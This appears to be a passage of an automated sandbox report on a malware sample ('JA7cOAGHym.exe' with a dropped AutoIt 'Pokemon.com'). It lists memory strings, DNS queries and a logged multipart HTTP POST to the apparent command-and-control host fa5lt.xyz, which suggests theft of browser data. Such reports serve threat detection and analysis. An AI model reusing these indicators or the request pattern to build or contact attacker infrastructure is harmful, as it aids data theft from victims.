                Source: 000003.log1.22.drString found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000010.00000002.2714074595.00007C1C00D54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000010.00000002.2714074595.00007C1C00D54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000010.00000002.2714074595.00007C1C00D54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000010.00000003.2632036175.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2649270304.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2625679705.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000010.00000002.2715928120.00007C1C012D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytcaogl equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000010.00000002.2714074595.00007C1C00D54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000010.00000002.2715404107.00007C1C01054000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707021602.00007C1C005C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000010.00000002.2715404107.00007C1C01054000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmllt equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000010.00000002.2707021602.00007C1C005C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlmetadatade equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
                Source: global traffic; DNS traffic detected: DNS query: BjQpTJiVkzRqS.BjQpTJiVkzRqS
                Source: global traffic; DNS traffic detected: DNS query: t.me
                Source: global traffic; DNS traffic detected: DNS query: fa5lt.xyz
                Source: global traffic; DNS traffic detected: DNS query: www.google.com
                Source: global traffic; DNS traffic detected: DNS query: ntp.msn.com
                Source: global traffic; DNS traffic detected: DNS query: bzib.nelreports.net
                Source: global traffic; DNS traffic detected: DNS query: clients2.googleusercontent.com
                Source: global traffic; DNS traffic detected: DNS query: chrome.cloudflare-dns.com
                Source: global traffic; DNS traffic detected: DNS query: sb.scorecardresearch.com
                Source: global traffic; DNS traffic detected: DNS query: assets.msn.com
                Source: unknown; HTTP traffic detected:
                    POST / HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----ZCTRQ9R1VKF3EU3OZCT0
                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                    Host: fa5lt.xyz
                    Content-Length: 255
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
                Source: chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/703603
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
                Source: chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
                Source: chrome.exe, 00000010.00000002.2712637460.00007C1C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2774531474.00005C840037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
                Source: chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553X
                Source: chrome.exe, 00000010.00000002.2706524682.00007C1C004B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
                Source: chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760Wa
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
                Source: chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
                Source: chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
                Source: chrome.exe, 00000010.00000002.2707577434.00007C1C00678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
                Source: chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229V
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2712637460.00007C1C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
                Source: chrome.exe, 00000010.00000002.2705307767.00007C1C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clients2.google.com/time/1/current
                Source: chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
                Source: JA7cOAGHym.exe String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                Source: JA7cOAGHym.exe String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                Source: JA7cOAGHym.exe String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                Source: JA7cOAGHym.exe String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                Source: JA7cOAGHym.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: JA7cOAGHym.exe String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                Source: JA7cOAGHym.exe String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                Source: JA7cOAGHym.exe String found in binary or memory: http://ocsp.sectigo.com0
                Source: JA7cOAGHym.exe String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                Source: JA7cOAGHym.exe String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                Source: Pokemon.com, 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp, Investigator.9.dr, Pokemon.com.2.dr String found in binary or memory: http://www.autoitscript.com/autoit3/X
                Source: Pokemon.com, 0000000C.00000002.3074481165.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3074481165.0000000004193000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3073484431.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, AS26FU.12.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                Source: Pokemon.com, 0000000C.00000002.3074481165.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3074481165.0000000004193000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3073484431.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, AS26FU.12.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                Source: Reporting and NEL.23.drString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
                Source: chrome.exe, 00000010.00000002.2713588754.00007C1C00C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706664303.00007C1C00500000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2708399052.00007C1C00724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
                Source: chrome.exe, 00000010.00000003.2632036175.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2649270304.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2684694630.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2712793704.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2625679705.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2672047195.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
                Source: Pokemon.com, 0000000C.00000002.3074481165.0000000004210000.00000004.00000800.00020000.00000000.sdmp, WLFCTJ.12.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: chrome.exe, 00000010.00000003.2632036175.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2649270304.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2684694630.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2712793704.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2625679705.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2672047195.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.ico
                Source: chrome.exe, 00000010.00000003.2632036175.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2649270304.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2684694630.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2712793704.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2625679705.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2672047195.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
                Source: Pokemon.com, 0000000C.00000002.3074481165.0000000004210000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3078503305.000000000671B000.00000004.00000800.00020000.00000000.sdmp, K6XB16.12.dr, Web Data.22.dr, WLFCTJ.12.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: chrome.exe, 00000010.00000002.2712637460.00007C1C00B74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search
                Source: chrome.exe, 00000010.00000002.2712637460.00007C1C00B74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
                Source: chrome.exe, 00000010.00000002.2712637460.00007C1C00B74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
                Source: Pokemon.com, 0000000C.00000002.3074481165.0000000004210000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3078503305.000000000671B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706334888.00007C1C00428000.00000004.00000800.00020000.00000000.sdmp, K6XB16.12.dr, Web Data.22.dr, WLFCTJ.12.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: chrome.exe, 00000010.00000003.2637997719.00007C1C00D8C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000002.2845246361.00005C840017C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                Source: chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore206E5
                Source: chrome.exe, 00000010.00000002.2715164010.00007C1C00FB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2710713687.00007C1C00968000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2715650379.00007C1C0118C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2705243132.00007C1C001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713913168.00007C1C00D0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2711269920.00007C1C009D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: chrome.exe, 00000010.00000002.2713913168.00007C1C00D0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enQ
                Source: chrome.exe, 00000010.00000003.2628640201.00007C1C00D8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626391112.00007C1C00C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2643146123.00007C1C00C60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2689129631.00007C1C0033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2637997719.00007C1C00D8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                Source: chrome.exe, 00000010.00000002.2703809491.00001B0400920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/
                Source: chrome.exe, 00000010.00000003.2662793010.00007C1C0240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2665322466.00001B0400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2617231990.00001B040071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
                Source: chrome.exe, 00000010.00000002.2703809491.00001B0400920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
                Source: chrome.exe, 00000010.00000003.2662793010.00007C1C0240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2665322466.00001B0400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2617231990.00001B040071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
                Source: chrome.exe, 00000010.00000002.2703809491.00001B0400920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
                Source: chrome.exe, 00000010.00000003.2662673911.00007C1C02914000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2667575304.00007C1C02654000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2667503110.00007C1C02650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2703809491.00001B0400920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
                Source: chrome.exe, 00000010.00000003.2662793010.00007C1C0240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2665322466.00001B0400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2617231990.00001B040071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
                Source: chrome.exe, 00000010.00000003.2662673911.00007C1C02914000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/https://google-ohttp-relay-query.fastly-edge.com/
                Source: chrome.exe, 00000010.00000002.2705307767.00007C1C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
                Source: chrome.exe, 00000010.00000002.2705307767.00007C1C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
                Source: msedge.exe, 00000014.00000002.2845246361.00005C840017C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.22.drString found in binary or memory: https://chromewebstore.google.com/
                Source: chrome.exe, 00000010.00000002.2714723724.00007C1C00E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
                Source: chrome.exe, 00000010.00000002.2705243132.00007C1C001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
                Source: chrome.exe, 00000010.00000002.2705243132.00007C1C001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/g
                Source: chrome.exe, 00000010.00000003.2613654695.00001550002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2613673296.00001550002EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                Source: chrome.exe, 00000010.00000002.2704873327.00007C1C000DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/c
                Source: chrome.exe, 00000010.00000003.2622417886.00007C1C004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2708196852.00007C1C00719000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707577434.00007C1C00678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2704552562.00007C1C0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2708155712.00007C1C00708000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000002.2842464846.00005C8400040000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.22.drString found in binary or memory: https://clients2.google.com/service/update2/crx
                Source: chrome.exe, 00000010.00000002.2698125418.00000024D99FD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxI&
                Source: chrome.exe, 00000010.00000002.2711111299.00007C1C009AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
                Source: chrome.exe, 00000010.00000002.2711111299.00007C1C009AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
                Source: chrome.exe, 00000010.00000002.2708399052.00007C1C00724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
                Source: chrome.exe, 00000010.00000002.2705243132.00007C1C001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync
                Source: chrome.exe, 00000010.00000002.2705243132.00007C1C001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync/event
                Source: chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
                Source: Pokemon.com, 0000000C.00000002.3074481165.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3074481165.0000000004193000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3073484431.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, AS26FU.12.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: Pokemon.com, 0000000C.00000002.3074481165.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3074481165.0000000004193000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3073484431.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, AS26FU.12.drString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                Source: chrome.exe, 00000010.00000002.2716662521.00007C1C01698000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
                Source: Reporting and NEL.23.drString found in binary or memory: https://deff.nelreports.net/api/report
                Source: Reporting and NEL.23.dr, 2cc80dabc69f58b6_0.22.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: Reporting and NEL.23.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msnw
                Source: chrome.exe, 00000010.00000002.2705712223.00007C1C00310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.goog
                Source: chrome.exe, 00000010.00000002.2705712223.00007C1C00310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.googl0
                Source: chrome.exe, 00000010.00000002.2705712223.00007C1C00310000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.22.drString found in binary or memory: https://docs.google.com/
                Source: chrome.exe, 00000010.00000002.2715928120.00007C1C012D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/
                Source: chrome.exe, 00000010.00000002.2716151641.00007C1C012F9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
                Source: chrome.exe, 00000010.00000003.2684694630.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2712793704.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2625434291.00007C1C00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713081034.00007C1C00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2715561352.00007C1C01154000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2716151641.00007C1C012F9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2672047195.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
                Source: chrome.exe, 00000010.00000002.2716151641.00007C1C012F9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
                Source: chrome.exe, 00000010.00000003.2662793010.00007C1C0240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
                Source: chrome.exe, 00000010.00000002.2715928120.00007C1C012D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/dogl
                Source: chrome.exe, 00000010.00000002.2714029253.00007C1C00D3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707021602.00007C1C005C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2716151641.00007C1C012F9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000010.00000002.2707021602.00007C1C005C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultc
                Source: chrome.exe, 00000010.00000002.2714029253.00007C1C00D3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultlt
                Source: chrome.exe, 00000010.00000002.2707021602.00007C1C005C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultnjb
